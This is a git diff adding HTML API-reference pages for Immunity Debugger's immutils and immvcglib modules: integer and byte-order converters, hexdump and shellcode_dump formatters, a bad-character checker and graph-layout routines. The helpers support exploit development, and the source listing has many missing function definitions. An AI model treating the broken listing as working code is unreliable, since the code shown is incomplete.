+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ big_order (int32 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ intel_order (int32 )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.0'
+
+
+
+
+
+ _MOSDEFimport_cachefailedimport = True
+
+
+
+
+
+
+ _MOSDEFimport_hook = False
+
+
+
+
+
+
+ _failed_imported_module_table = []
+
+
+
+
+
+ goodchars = '.()~!#$%^&*()-=_/\\:<>'
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immutils-pysrc.html b/1.73/Documentation/Ref/Libs.immutils-pysrc.html
new file mode 100755
index 0000000..eebff4d
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immutils-pysrc.html
@@ -0,0 +1,1196 @@
+
+
+
+
+ Libs.immutils
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immutils
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 MOSDEF utils for non-CANVAS users 11 12 """ 13
+ 14
+ 15 __VERSION__ = '1.0' 16
+ 17
+ 18
+ 19
+ 20
+ 21
+ 22
+ 23
+ 24
+ 25
+ 26 import sys , os 27 sys . path . append ( '.' ) 28
+ 29
+ 30
+ 31
+
36 devlog = __ignore 37 isdebug = __ignore 38 warnings_safely_ignore = __ignore 39 warning_restore = __ignore 40 deprecate = __ignore 41 uniqlist = __retsamearg 42
+ 43
+ 44
+ 45
+ 46
+ 47
+ 48
+ 49
+ 50
+ 51 _MOSDEFimport_hook = True 52 _MOSDEFimport_cachefailedimport = True 53
+ 54
+ 55
+ 56
+ 57
+ 58 from traceback import format_exc
63 modname = args [ 0 ]
+ 64 if __debug__ :
+ 65 if len ( args ) < 4 or args [ 3 ] == None :
+ 66 devlog ( 'MOSDEFimport' , "IMPORT %s" % modname )
+ 67 else :
+ 68 if len ( args [ 3 ] ) == 1 :
+ 69 val = args [ 3 ] [ 0 ]
+ 70 else :
+ 71 val = str ( args [ 3 ] ) [ 1 : - 1 ]
+ 72 devlog ( 'MOSDEFimport' , "FROM %s IMPORT %s" % ( modname , val ) , nofile = True )
+ 73 if _MOSDEFimport_cachefailedimport :
+ 74 modhash = mod_hash ( modname )
+ 75 if modhash in _failed_imported_module_table :
+ 76 devlog ( 'MOSDEFimport' , "already failed to import <%s>" % modname , nofile = True )
+ 77 raise ImportError
+ 78 cwd = os . getcwd ( )
+ 79 filepath = os . path . dirname ( globals ( ) [ '__file__' ] )
+ 80 mosdefpath = filepath . replace ( cwd , "." )
+ 81
+ 82
+ 83
+ 84 sys . path = uniqlist ( sys . path )
+ 85 if cwd != mosdefpath and mosdefpath not in sys . path :
+ 86 sys . path . insert ( 0 , mosdefpath )
+ 87 import_time = time . time ( )
+ 88 try :
+ 89 return sys . modules [ '__builtin__' ] . __import__orig ( * args )
+ 90 except :
+ 91 if _MOSDEFimport_cachefailedimport :
+ 92 _failed_imported_module_table += [ modhash ]
+ 93 devlog ( 'all' , "failed to import <%s> (lost %ss)" % ( modname , time . time ( ) - import_time ) , nofile = True )
+ 94 devlog ( 'ImportError' , format_exc ( 0 ) . split ( '\n' ) [ 1 ] , nodesc = True )
+ 95 if isdebug ( 'ImportErrorTrace' ) :
+ 96 backtrace ( )
+ 97 raise
+ 98 import __builtin__ 99 if _MOSDEFimport_hook and not hasattr ( __builtin__ , '__import__orig' ) : 100 import time
+101 __builtin__ . __import__orig = __builtin__ . __import__
+102 __builtin__ . __import__ = __MOSDEFimport__
+103 _MOSDEFimport_hook = False
+104 _failed_imported_module_table = [ ]
+105 devlog ( 'all' , "__import__ hooked with __MOSDEFimport__" )
+106 del __builtin__ 107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118 import types 119
+
121
+
123 if type ( arg ) == types . DictType :
+
124 d = { }
+
125 for item in arg . items ( ) :
+
126 d . __setitem__ ( item [ 0 ] , item [ 1 ] )
+
127 arg = d
+
128 return types . DictType . __init__ ( self , arg )
+
129
+
131 if type ( itemvalue ) == types . FloatType :
+
132 itemvalue = int ( itemvalue )
+
133 return types . DictType . __setitem__ ( self , itemname , itemvalue )
+
134
+
136 item = types . DictType . __getitem__ ( self , itemname )
+
137 if type ( item ) == types . FloatType :
+
138 item = int ( item )
+
139 return item
+
140
+
143
+
145 try :
+
146 wordstr = intel_order ( word )
+
147 except :
+
148 wordstr = str ( word )
+
149 for ch in badchars :
+
150 if wordstr . count ( ch ) :
+
151 return 1
+
152 return 0
+
153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+
165 assert not bits % 8 , "bits should be sizeof(char) aligned, got %d" % bits
+
166
+
168 if assertmsg != "" :
+
169 assertmsg += "\n"
+
170 assert len ( s ) >= l , "%sexpecting a at_least_%d_chars string, got %d_chars instead.\nstring is: %s" % \
+
171 ( assertmsg , l , len ( s ) , prettyprint ( s ) )
+
172
+
181
+182
+
185
+
197
+
200
+201
+202
+203
+204
+
208
+
211
+
214
+
217
+
220
+221
+222
+223
+224
+
226 check_bits_consistancy ( bits )
+
227 assert type ( s ) == type ( "" ) , "str2int_bits() expects a string argument, got %s" % type ( s )
+
228 nchars = bits / 8
+
229 check_string_len ( s , nchars , "str2int_bits(%d, s): string=<%s> len=%d" % ( bits , s , len ( s ) ) )
+
230 r = 0
+
231 warnings_safely_ignore ( FutureWarning )
+
232 for i in range ( 0 , nchars ) :
+
233
+
234 r += ord ( s [ nchars - i - 1 ] ) << 8 * i
+
235 warning_restore ( )
+
236 return r
+
237
+
241
+
244
+
247
+
250
+
253
+
256
+
259
+260
+261
+262
+263
+264
+265
+266
+267
+268
+269
+270
+271
+272
+273
+
275 """
+
276 oppposite of istr2int
+
277 """
+
278 return str2int32 ( astring )
+
279
+280
+281
+
284
+
286 check_bits_consistancy ( bits )
+
287 r = 0
+
288 warnings_safely_ignore ( FutureWarning )
+
289 for b in range ( 0 , bits , 8 ) :
+
290 r += ( ( ( i >> b ) & 0xff ) << ( bits - ( b + 8 ) ) )
+
291 warning_restore ( )
+
292 return r
+
293
+
296
+
299
+
302
+303 """ 304 istr2halfword(halfword2bstr(dInt(x))) == byteswap_16(x) 305 """ 306
+307
+308
+309
+310
+311
+312
+313
+314
+315
+
317 if not type ( s ) == type ( "" ) :
+
318 return "can not hexdump %s" % type ( s )
+
319 tmp = ""
+
320 for c in s :
+
321 tmp += "[0x%2.2x]" % ord ( c )
+
322 return tmp
+
323
+324 goodchars = ".()~!#$%^&*()-=_/\\:<>" 325
+
327 import string
+
328 if not type ( instring ) == type ( "" ) :
+
329 devlog ( "prettyprint got %s and not string" % type ( instring ) )
+
330 instring = str ( instring )
+
331
+
332 tmp = ""
+
333 for ch in instring :
+
334
+
335 if ch in string . printable and ch not in [ "\x0c" ] :
+
336 tmp += ch
+
337 else :
+
338 value = "%2.2x" % ord ( ch )
+
339 tmp += "[" + value + "]"
+
340
+
341 return tmp
+
342
+
344 if not type ( data ) == type ( "" ) :
+
345 devlog ( "c_array() got %s and not string" % type ( data ) )
+
346 return "c_array() can not dump %s" % type ( data )
+
347 if not len ( data ) :
+
348 return "c_array() got void buffer"
+
349
+
350 ucharbuf = "unsigned char buf[] = \""
+
351 for uchar in data :
+
352 ucharbuf += "\\x%02x" % ord ( uchar )
+
353 ucharbuf += "\"; // %d byte" % len ( data )
+
354 if len ( data ) > 1 :
+
355 ucharbuf += "s"
+
356 if desc :
+
357 ucharbuf += ", %s" % desc
+
358
+
359 return ucharbuf
+
360
+361 - def shellcode_dump ( sc , align = 0 , alignpad = " " , alignmax = 16 , mode = None ) :
+
362 import types
+
363 assert type ( align ) == type ( 0 ) , "error in arguments, expecting an int for 'align'"
+
364 if not type ( sc ) in [ types . StringType , types . BufferType ] :
+
365 devlog ( "shellcode_dump() got %s and not string" % type ( sc ) )
+
366 return type ( sc )
+
367 if not len ( sc ) :
+
368 return "void buffer"
+
369 if mode and mode . upper ( ) == "RISC" :
+
370 align = 4
+
371 alignmax = 4
+
372 if align :
+
373 alignmax *= align
+
374 buf = ""
+
375 i = 0
+
376 for c in sc :
+
377 buf += "%02x " % ord ( c )
+
378 if align and ( i % align ) == ( align - 1 ) :
+
379 buf += alignpad
+
380 if alignmax and ( i % alignmax ) == ( alignmax - 1 ) :
+
381 buf += "\n"
+
382 i += 1
+
383 if buf [ - 1 ] == "\n" :
+
384 buf = buf [ : - 1 ]
+
385 return buf
+
386
+
388 """
+
389 we just want to write some data on any fd, opened or closed.
+
390 """
+
391 import os
+
392 try :
+
393 os . write ( fd , data )
+
394 except OSError , errargs :
+
395 import errno
+
396 if errargs . errno != errno . EBADF :
+
397 raise
+
398
+
400 sys . stderr . write ( "WARNING: %s\n" % msg )
+
401
+402
+403
+404
+405
+406
+407
+408
+409
+
411 binstr = ""
+
412 for bit in range ( 0 , bits ) :
+
413 if i & ( long ( 1 ) << bit ) :
+
414 binstr = "1" + binstr
+
415 else :
+
416 binstr = "0" + binstr
+
417 return binstr
+
418
+
421
+
424
+
427
+
430
+
433
+
436
+
439
+440
+441
+442
+443
+444
+445
+446
+447
+
449 """
+
450 Turns sint into an int, hopefully
+
451 python's int() doesn't handle negatives with base 0 well
+
452 """
+
453 if sint == None or type ( sint ) in [ type ( ( 1 , 1 ) ) , type ( [ 1 ] ) , type ( { } ) ] :
+
454 devlog ( "Type ERROR: dInt(%s)!" % str ( sint ) )
+
455
+
456 raise TypeError , "type %s for dInt(%s)" % ( type ( sint ) , str ( sint ) )
+
457
+
458 s = str ( sint )
+
459 if s [ 0 : 2 ] == "0x" :
+
460 return long ( s , 0 )
+
461 else :
+
462
+
463
+
464 return long ( float ( s ) )
+
465
+
467 """ returns [1,0,0,0,0,0,0,0] from "\x80"
+
468 """
+
469 if not bits :
+
470
+
471 bits = len ( astr ) * 8
+
472 ret = [ ]
+
473
+
474 for c in astr :
+
475
+
476 mask = 0x80
+
477 for i in range ( 0 , 8 ) :
+
478
+
479 if mask & ord ( c ) :
+
480 bit = 1
+
481 else :
+
482 bit = 0
+
483 ret += [ bit ]
+
484 if len ( ret ) == bits :
+
485 break
+
486 mask = mask >> 1
+
487 return ret
+
488
+
490 mydict = { "1" : 1 , "0" : 0 }
+
491 tmp = 0
+
492 for c in mystr :
+
493 value = mydict [ c ]
+
494 tmp = ( tmp << 1 ) + value
+
495 return tmp
+
496
+497
+
499 tbl = [ ]
+
500 tmp = ""
+
501 hex = ""
+
502 i = 0
+
503 for a in buf :
+
504 hex += "%02X " % ord ( a )
+
505 i += 1
+
506 if ord ( a ) >= 0x20 and ord ( a ) < 0x7f :
+
507 tmp += a
+
508 else :
+
509 tmp += "."
+
510 if i % 16 == 0 :
+
511 tbl . append ( ( hex , tmp ) )
+
512 hex = ""
+
513 tmp = ""
+
514 tbl . append ( ( hex , tmp ) )
+
515 return tbl
+
516
+
518 """
+
519 A nicely displayed hexdump as a string
+
520 """
+
521
+
522 if not type ( s ) == type ( "" ) :
+
523 return "can not hexdump %s" % type ( s )
+
524 tmp = [ ]
+
525 i = 1
+
526 for c in s :
+
527 tmp += [ "%2.2x " % ord ( c ) ]
+
528 if i % length == 0 :
+
529 tmp += [ "\n" ]
+
530 i += 1
+
531 return "" . join ( tmp )
+
532
+533
+534
+
537
+
539
+
540 c = dInt ( c )
+
541
+
542
+
543
+
544 return c & ( ( long ( 1 ) << bits ) - 1 )
+
545
+
552
+
554 n = 1 << 3
+
555 while True :
+
556 if bits <= n :
+
557 break
+
558 n <<= 1
+
559 n /= 4
+
560 return "0x%%0%dx" % n
+
561
+562
+
568
+
578
+579 - def bits ( myint , maxbits = 32 ) :
+
580 """counts the number of bits in an integer the slow way"""
+
581 b = 0
+
582 myint = uint_bits ( maxbits , myint )
+
583 while myint >> b :
+
584 b += 1
+
585 return b
+
586
+587
+588
+
591
+
594
+
597
+
600
+
603
+
606
+
609
+
612
+
615
+
618
+
621
+
624
+
627
+
630
+
632 """
+
633 Checks for integer, hex or no
+
634 """
+
635 try :
+
636 num = int ( str , 0 )
+
637 return 1
+
638 except ValueError :
+
639 return 0
+
640
+641
+642
+643
+644
+645
+646
+647
+648
+649
+650
+
652 deprecate ( "use sint16() instead" )
+
653 return sint16 ( i )
+
654
+
656 deprecate ( "use sint32() instead" )
+
657 return sint32 ( big )
+
658
+
660 assert sys . version_info [ 0 ] >= 2 and ( sys . version_info [ 0 ] == 2 and sys . version_info [ 1 ] >= 4 ) , \
+
661 "\nyou tried to call int2uns() but your python %d.%d is too old to handle it correctly\n" \
+
662 "Python versions before 2.4 are fucked up with integers, rely on 2.4 only!" % \
+
663 ( sys . version_info [ 0 ] , sys . version_info [ 1 ] )
+
664 deprecate ( "use uint32() instead" )
+
665 return uint32 ( small )
+
666
+
670
+
674
+675
+676
+677
+678
+679
+680
+681
+682
+683
+684
+685
+686
+687
+688
+689
+
691 deprecate ( "use str2littleendian instead" )
+
692 return str2littleendian ( astring )
+
693
+694
+
698
+699
+700
+701
+702
+703
+704
+705
+706
+707
+708
+709
+710
+711
+712
+713
+714
+715
+716
+717
+718
+719
+720
+721
+722
+723
+724 """ 725 >>> print hexprint(halfword2bstr(0x1234)) 726 [0x12][0x34] 727 >>> print hexprint(short2bigstr(0x1234)) 728 [0x12][0x34] 729 >>> print hexprint("".join(int2list(uint16(0x1234))[2:4])) 730 [0x12][0x34] 731 732 >>> print hexprint(halfword2istr(0x1234)) 733 [0x34][0x12] 734 >>> print hexprint("".join(int2list(byteswap_16(uint16(0x1234)))[2:4])) 735 [0x34][0x12] 736 737 >>> print uint16fmt(istr2halfword(halfword2bstr(dInt(0x1234)))) 738 0x3412 739 >>> print uint16fmt(byteswap_16(0x1234)) 740 0x3412 741 742 >>> print hexprint(halfword2bstr(0x1234)) 743 [0x12][0x34] 744 >>> print hexprint(int2str_bits(16, 0x1234)) 745 [0x12][0x34] 746 >>> print hexprint(halfword2bstr(0x12345678)) 747 [0x56][0x78] 748 >>> print hexprint(int2str_bits(16, 0x12345678)) 749 [0x56][0x78] 750 >>> print hexprint(int2str16(0x1234)) 751 [0x12][0x34] 752 >>> print hexprint(int2str16(0x1234, swap=1)) 753 [0x34][0x12] 754 >>> print hexprint(int2str16_swapped(0x1234)) 755 [0x34][0x12] 756 """ 757
+
761
+
765
+
768
+
771
+
774
+775
+776
+777
+778
+779
+780
+781
+782
+783
+784
+785
+786
+787
+788
+789
+790
+791
+792
+793
+794
+795
+796
+797
+798
+799
+800
+801
+802
+803
+804
+805
+806
+807
+
809 """
+
810 Opposite of str2bigendian
+
811 """
+
812
+
813 return int2str32 ( int32 )
+
814
+
816 """
+
817 bijection of str2littleendian()
+
818 """
+
819
+
820 return int2str32_swapped ( int32 )
+
821
+822
+823
+824
+825
+826
+827
+828
+829
+830
+831
+832
+833
+
835 deprecate ( "use binary_string_int32 instead" )
+
836 return binary_string_int ( int32 )
+
837
+
839 if num == 0 :
+
840 return '0' * 32
+
841 if num < 0 :
+
842 return ''
+
843 ret = ''
+
844
+
845 for a in range ( 0 , 32 ) :
+
846 ret = str ( num & 0x1 ) + ret
+
847 num = num >> 1
+
848
+
849 return ret
+
850
+851
+852
+853
+854
+855
+856
+857
+858
+859
+860
+861 if __name__ == "__main__" : 862
+863 warnings_safely_ignore ( FutureWarning )
+864
+865 - def test ( funcname ) :
+
866 print "testing %s() ..." % funcname
+
867
+868 print "running tests..."
+869
+870 test ( "split_int32" )
+871 assert split_int32 ( 0x12345678 ) == [ 0x12 , 0x34 , 0x56 , 0x78 ]
+872
+873 test ( "str2int16" )
+874 assert str2int16 ( '\x12\x34\x56' ) == 0x1234
+875 assert nstr2halfword ( '\x12\x34\x56\x78' ) == 0x1234
+876
+877 test ( "str2int16_swapped" )
+878 assert str2int16_swapped ( '\x12\x34' ) == 0x3412
+879 assert istr2halfword ( '\x12\x34' ) == 0x3412
+880 assert str2int16_swapped ( '\x12\x34\x56\x78' ) == 0x3412
+881
+882 test ( "str2littleendian" )
+883 assert str2littleendian ( '\x12\x34\x56\x78' ) == 0x78563412
+884 assert intel_str2int ( '\x12\x34\x56\x78' ) == 0x78563412
+885 assert istr2int ( '\x12\x34\x56\x78' ) == 0x78563412
+886
+887 test ( "str2bigendian/str2int32" )
+888 assert str2int32 ( '\x12\x34\x56\x78' ) == 0x12345678
+889 assert str2bigendian ( '\x12\x34\x56\x78' ) == 0x12345678
+890
+891 test ( "int2str16" )
+892 assert int2str16 ( 0x1234 ) == '\x12\x34'
+893 assert halfword2bstr ( 0x1234 ) == '\x12\x34'
+894 assert short2bigstr ( 0x1234 ) == '\x12\x34'
+895 assert big_short ( 0x1234 ) == '\x12\x34'
+896
+897 test ( "int2str16_swapped" )
+898 assert int2str16_swapped ( 0x1234 ) == '\x34\x12'
+899 assert halfword2istr ( 0x1234 ) == '\x34\x12'
+900 assert intel_short ( 0x1234 ) == '\x34\x12'
+901 assert intel_short ( 0x12345678 ) == '\x78\x56'
+902
+903 test ( "int2str32" )
+904 assert int2str32 ( 0x12345678 ) == '\x12\x34\x56\x78'
+905 assert big_order ( 0x12345678 ) == '\x12\x34\x56\x78'
+906
+907 test ( "int2str32_swapped" )
+908 assert int2str32_swapped ( 0x12345678 ) == '\x78\x56\x34\x12'
+909 assert intel_order ( 0x12345678 ) == '\x78\x56\x34\x12'
+910
+911 test ( "binary_string_int" )
+912 assert print_binary ( 0x12345678 ) == '00010010001101000101011001111000'
+913
+914 test ( "binary_string_int" )
+915 assert binary_string_short ( 0x12345678 ) == '0101011001111000'
+916
+917 try :
+918 assert int2uns ( - 1 ) == 0xffffffffL
+919 except AssertionError :
+920 print "[!] failed: int2uns(-1) == 0xffffffff"
+921 assert sys . version_info [ 0 ] >= 2 , "word, what an old Python you have :/"
+922 if sys . version_info [ 0 ] == 2 and sys . version_info [ 1 ] < 4 :
+923 print "Python 2.3 integers are fucked up, rely on 2.4 only!"
+924 print "your version can not handle int2uns() correctly"
+925 pass
+926 else :
+927 raise
+928
+929 test ( "uint16" )
+930 assert uint16 ( 0xffff ) == 0xffff
+931 assert uint16 ( 0x12345678 ) == 0x5678
+932
+933 test ( "sint16" )
+934 assert sint16 ( 0xffff ) == - 1
+935 assert sint16 ( 0xffff ) == sint16 ( - 1 )
+936 assert signedshort ( 0xffff ) == - 1
+937
+938 test ( "sint32" )
+939 assert sint32 ( - 1 ) == - 1
+940 assert big2int ( 0x123456789 ) == 0x23456789
+941
+942 test ( "uintfmt_bits" )
+943 assert uintfmt_bits ( 32 , 0x12345678 ) == '0x12345678'
+944 assert uintfmt_bits ( 32 , 0x1234 ) == '0x00001234'
+945 assert uintfmt_bits ( 24 , 0x1234 ) == '0x00001234'
+946 assert uintfmt_bits ( 16 , 0x1234 ) == '0x1234'
+947
+948 test ( "uint16fmt" )
+949 assert uint16fmt ( 0x123456 ) == '0x3456'
+950 assert uint16fmt ( - 0x123456 ) == '0xcbaa'
+951
+952 test ( "uint32fmt" )
+953 assert uint32fmt ( 0x1234 ) == '0x00001234'
+954
+955 test ( "uint64fmt" )
+956 assert uint64fmt ( 0x12345678 ) == '0x0000000012345678'
+957 assert uint64fmt ( - 1 ) == '0xffffffffffffffff'
+958
+959 test ( "sint16fmt" )
+960 assert sint16fmt ( 0x1234 ) == '0x1234'
+961 assert sint16fmt ( - 0x1234 ) == '-0x1234'
+962 assert sint16fmt ( - 0x12345678 ) == '-0x5678'
+963
+964
+965
+966 test ( "sint32fmt" )
+967 assert sint32fmt ( 0x1234 ) == '0x00001234'
+968 assert sint32fmt ( - 0x1234 ) == '-0x00001234'
+969
+970 test ( "sint64fmt" )
+971 assert sint64fmt ( - 1 ) == '-0x0000000000000001'
+972
+973 test ( "byteswap_32" )
+974 assert byteswap_32 ( 0x12345678 ) == 0x78563412
+975
+976 test ( "byteswap_64" )
+977 assert byteswap_64 ( 0x1234567890123456 ) == 0x5634129078563412
+978
+979
+980 assert uint8fmt ( 0x0f ) == '0x0f'
+981
+982 print "done."
+983
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immutils.antifloatdict-class.html b/1.73/Documentation/Ref/Libs.immutils.antifloatdict-class.html
new file mode 100755
index 0000000..cdfd852
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immutils.antifloatdict-class.html
@@ -0,0 +1,401 @@
+
+
+
+
+ Libs.immutils.antifloatdict
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immutils ::
+ Class antifloatdict
+
+
+
+
+
+
+
+
+Class antifloatdict source code
+
+object --+
+ |
+ dict --+
+ |
+ antifloatdict
+
+
+
+
+
+
+
+new empty dictionary
+
+
+
+
+ __init__ (self ,
+ arg ={}
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ a shallow copy of D
+
+
+
+
+
+
+
+ Inherited from dict :
+ __cmp__,
+ __contains__,
+ __delitem__,
+ __eq__,
+ __ge__,
+ __getattribute__,
+ __gt__,
+ __hash__,
+ __iter__,
+ __le__,
+ __len__,
+ __lt__,
+ __ne__,
+ __new__,
+ __repr__,
+ clear,
+ fromkeys,
+ get,
+ has_key,
+ items,
+ iteritems,
+ iterkeys,
+ itervalues,
+ keys,
+ pop,
+ popitem,
+ setdefault,
+ update,
+ values
+
+ Inherited from object :
+ __delattr__,
+ __reduce__,
+ __reduce_ex__,
+ __setattr__,
+ __str__
+
+
+
+
+
+
+
+
+
+ Inherited from object :
+ __class__
+
+
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ arg ={}(Constructor)
+ source code
+
+ x.__init__(...) initializes x; see x.__class__.__doc__ for
+ signature
+
+ Returns:
+new empty dictionary
+
+
+ Overrides:
+ object.__init__
+ (inherited documentation)
+
+
+
+
+
+
+ __setitem__ (self ,
+ itemname ,
+ itemvalue )(Index assignment operator)
+ source code
+
+ x[i]=y
+
+ Overrides:
+ dict.__setitem__
+ (inherited documentation)
+
+
+
+
+
+
+ __getitem__ (self ,
+ itemname )(Indexing operator)
+ source code
+
+ x[y]
+
+ Overrides:
+ dict.__getitem__
+ (inherited documentation)
+
+
+
+
+
+
+
+
+ Returns: a shallow copy of D
+ Overrides:
+ dict.copy
+ (inherited documentation)
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immvcglib-module.html b/1.73/Documentation/Ref/Libs.immvcglib-module.html
new file mode 100755
index 0000000..30cc2da
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immvcglib-module.html
@@ -0,0 +1,822 @@
+
+
+
+
+ Libs.immvcglib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immvcglib
+
+
+
+
+
+
+
+
+Module immvcglib source code
+Reads vcg buffer and creates the graph using Immunity Debugger lib
+ (c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+
+
+
+
+
+ testVCGParse (path )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ generateGraph (address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ adjustStartCoords (vertices ,
+ G )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createVertexList (nodes ,
+ handler )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ finalAttemptToPlace (vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ searchForDummyPathsH2South (edgelist ,
+ vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ searchForDummyPathsH2North (edgelist ,
+ vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ applyDummyPathsH2SouthTrue (vertexlist ,
+ edgelist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ applyDummyPathsH2South (vertexlist ,
+ edgelist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ applyDummyPathsH2North2 (vertexlist ,
+ edgelist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ applyDummyPathsH2North (vertexlist ,
+ edgelist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ searchForDummyPathsW (edgelist ,
+ vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ pathFinder (vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ addEndPointToEdge (edgelist )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ drawEdges (edgelist ,
+ handler )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ createAdjacencyList (G ,
+ vertices ,
+ edges )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ firstAttemptToPlace (vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ defineVertexRelation (vertices )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ generateVCG (address )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+ saveVCG (address ,
+ filename )
+ source code
+
+
+
+
+
+
+
+
+
+
+
+
+
+ __VERSION__ = '1.2'
+
+
+
+
+
+ PALETTE = ['manhattan_edges: yes\r\n', 'layoutalgorithm: minde...
+
+
+
+
+
+
+
+
+ checkForPlacedVertex (vertex2check ,
+ vertices ) source code
+
+ Note: needs to divide graph in layers
+ Draft notes: step 1 get temptative coords to place vertex step 2 check
+ if coords overlaps already placed vertex
+ step 2 a) first we have to check if (y,y2) of vertex is in range of
+ the placed vertex,
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+ if that condition is true, means we have a vertex in the same y that
+ an already placed vertex, so it might be possible of an overlapping to
+ exists, so we are going to ask:
+ if x >= xp and x <= x2p: if that condition is true, then we have
+ an overlapping over the y coord of the vertex (left point)
+ if x2 >= xp and x <= x2p: if that condition is true, then we
+ have an overlapping over the y coord of the vertex (right point)
+ and if does, check whether x or x2 is overlapping once we know that,
+ we need to check wheter x or x2 of overlapped vertex is touched if x ,
+ move west x - 10 and recheck
+
+
+
+
+
+
+
+
+ checkForPlacedVertex2 (vertex2check ,
+ vertices ) source code
+
+ Note: needs to divide graph in layers
+ Draft notes: step 1 get temptative coords to place vertex step 2 check
+ if coords overlaps already placed vertex
+ step 2 a) first we have to check if (y,y2) of vertex is in range of
+ the placed vertex,
+ if y >= yp and y <= y2p or y2 >= yp and y2 <= y2p:
+ if that condition is true, means we have a vertex in the same y that
+ an already placed vertex, so it might be possible of an overlapping to
+ exists, so we are going to ask:
+ if x >= xp and x <= x2p: if that condition is true, then we have
+ an overlapping over the y coord of the vertex (left point)
+ if x2 >= xp and x <= x2p: if that condition is true, then we
+ have an overlapping over the y coord of the vertex (right point)
+ and if does, check whether x or x2 is overlapping once we know that,
+ we need to check wheter x or x2 of overlapped vertex is touched if x ,
+ move west x - 10 and recheck
+
+
+
+
+
+
+ __VERSION__
+
+
+NOTES:
+need to divide graph in layers
+save max layer in graph
+every set of childs [unique and different part vertex] E a different layer
+save vertex of layer in each layer
+mark blank path points in each layer [i preffer path points to dummy vertices]
+
+for layer in layers:
+ move east and west vertices, depending on their type *
+
+pathfinder(graph)
+ search empy spots where edge lines might travel
+
+
+a cool thing might be mark the whole graph as east-slanted or west-slanted, according the graph
+the n east or n west it will move
+
+if the graph is slanting too much to east from center point, we can start thinking on going west
+that can be too fuzzy, but will try to make an aproach for human eye
+
+
+new lib against old lib:
+orphan vertices from old lib has been solved, now every vertex has at least 1 relationship saved
+parent<->child type of vertex are correctly relationed now
+
+
+
+
+
+ Value:
+
+
+
+
+
+
+
+ PALETTE
+
+
+
+
+ Value:
+
+['''manhattan_edges: yes\r
+''',
+ '''layoutalgorithm: mindepth\r
+''',
+ '''finetuning: no\r
+''',
+ '''layout_downfactor: 100\r
+''',
+...
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.immvcglib-pysrc.html b/1.73/Documentation/Ref/Libs.immvcglib-pysrc.html
new file mode 100755
index 0000000..84c921a
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.immvcglib-pysrc.html
@@ -0,0 +1,1608 @@
+
+
+
+
+ Libs.immvcglib
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module immvcglib
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 Reads vcg buffer and creates the graph using Immunity Debugger lib 5 6 (c) Immunity, Inc. 2004-2007 7 8 9 U{Immunity Inc.<http://www.immunityinc.com>} 10 11 12 """ 13
+ 14 __VERSION__ = '1.2' 15
+ 16
